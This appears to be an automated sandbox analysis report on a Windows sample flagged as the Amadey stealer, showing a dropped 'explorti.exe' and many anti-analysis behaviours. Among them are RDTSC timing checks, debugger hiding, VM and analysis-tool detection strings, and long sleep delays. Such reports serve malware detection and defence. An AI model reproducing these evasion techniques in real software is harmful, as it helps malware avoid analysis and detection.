Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10BB7 second address: 4A10BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10BBB second address: 4A10BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10BC1 second address: 4A10BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10BC7 second address: 4A10BF5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FFAAD0A8F20h 0x00000012 pop ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov cx, dx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10BF5 second address: 4A10BFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10A1C second address: 4A10A20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10A20 second address: 4A10A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80B8E second address: 4A80BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80BAB second address: 4A80BB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80BB0 second address: 4A80BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007FFAAD0A8F1Dh 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jmp 00007FFAAD0A8F1Eh 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80BDB second address: 4A80BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80BDF second address: 4A80BE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80BE5 second address: 4A80C29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FFAACBEF8D0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FFAACBEF8D7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80016 second address: 4A800B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 251EFC2Bh 0x00000010 pushfd 0x00000011 jmp 00007FFAAD0A8F20h 0x00000016 sub eax, 25BB43B8h 0x0000001c jmp 00007FFAAD0A8F1Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FFAAD0A8F1Fh 0x0000002b sbb eax, 4E3C7D7Eh 0x00000031 jmp 00007FFAAD0A8F29h 0x00000036 popfd 0x00000037 mov dl, ah 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b jmp 00007FFAAD0A8F23h 0x00000040 mov ebp, esp 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007FFAAD0A8F25h 0x00000049 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A800B2 second address: 4A800D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8CDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A800D7 second address: 4A800E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A800E7 second address: 4A800EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10E09 second address: 4A10E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10E0F second address: 4A10E32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov dx, ax 0x00000010 mov ch, A4h 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10E32 second address: 4A10E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10E36 second address: 4A10E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A10E52 second address: 4A10E68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 movsx edi, si 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov cx, di 0x00000013 mov ch, dh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A803CC second address: 4A803E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A803E1 second address: 4A80436 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FFAAD0A8F27h 0x00000009 jmp 00007FFAAD0A8F23h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 jmp 00007FFAAD0A8F20h 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FFAAD0A8F1Dh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80436 second address: 4A80462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FFAACBEF8CEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80462 second address: 4A80466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80466 second address: 4A8046A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A8046A second address: 4A80470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80470 second address: 4A80477 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80477 second address: 4A80489 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push dword ptr [ebp+0Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov dl, 12h 0x0000000f mov ah, B3h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80489 second address: 4A804A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, 7A0Ch 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A804A2 second address: 4A80500 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAAD0A8F20h 0x00000008 push ecx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push A706B1DBh 0x00000012 jmp 00007FFAAD0A8F1Dh 0x00000017 add dword ptr [esp], 58FA4E27h 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bh, 23h 0x00000023 pushfd 0x00000024 jmp 00007FFAAD0A8F24h 0x00000029 adc ecx, 7A478FB8h 0x0000002f jmp 00007FFAAD0A8F1Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80500 second address: 4A80518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8D4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80561 second address: 4A80579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A80579 second address: 4A80590 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E9FE second address: F7EA04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7EA04 second address: F7EA23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d ja 00007FFAACBEF8CCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7EA23 second address: F7EA3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007FFAAD0A8F25h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A302A1 second address: 4A302A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A302A5 second address: 4A302AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A302AB second address: 4A302ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8CCh 0x00000008 call 00007FFAACBEF8D2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FFAACBEF8D8h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A302ED second address: 4A302F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A302F1 second address: 4A302F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A302F7 second address: 4A30308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30308 second address: 4A3033A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov ebx, ecx 0x00000011 mov bh, ch 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FFAACBEF8CEh 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A3033A second address: 4A30353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30353 second address: 4A30357 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30357 second address: 4A30369 instructions: 0x00000000 rdtsc 0x00000002 mov dl, 24h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push 35755477h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30369 second address: 4A30377 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30377 second address: 4A3037D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A30511 second address: 4A30538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8D5h 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: DCECD5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F73156 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: F9B76F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 100090D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 59ECD5 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 743156 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 76B76F instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 7D090D instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04A803B5 rdtsc

0_2_04A803B5

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1387	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 511	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1004	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1235	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8172	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8144	Thread sleep count: 1387 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8144	Thread sleep time: -2775387s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8108	Thread sleep count: 511 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8108	Thread sleep time: -15330000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3736	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8128	Thread sleep count: 1004 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8128	Thread sleep time: -2009004s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8136	Thread sleep count: 1235 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 8136	Thread sleep time: -2471235s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000006.00000002.2932965487.00000000014B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorti.exe, 00000006.00000002.2932965487.00000000014F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW6<C
Source: file.exe, 00000000.00000002.1711517726.0000000000F50000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1739917497.0000000000720000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000002.00000002.1740152344.0000000000720000.00000040.00000001.01000000.00000008.sdmp, explorti.exe, 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04A803B5 rdtsc

0_2_04A803B5

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0056645B mov eax, dword ptr fs:[00000030h]		6_2_0056645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 6_2_0056A1C2 mov eax, dword ptr fs:[00000030h]		6_2_0056A1C2

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Jump to behavior

Source: explorti.exe, explorti.exe, 00000006.00000002.2931636167.0000000000720000.00000040.00000001.01000000.00000008.sdmp

Binary or memory string: LProgram Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0054D312 cpuid

6_2_0054D312

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000051000\08d3f7ce12.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Queries volume information: C:\Users\user\AppData\Roaming\1000052000\c840affdc0.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 6_2_0054CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

6_2_0054CB1A

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 6.2.explorti.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.explorti.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.explorti.exe.530000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1699866762.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1699390143.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1740065067.0000000000531000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2931526635.0000000000531000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2279702263.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1711456271.0000000000D61000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1739755921.0000000000531000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1670647097.0000000004870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
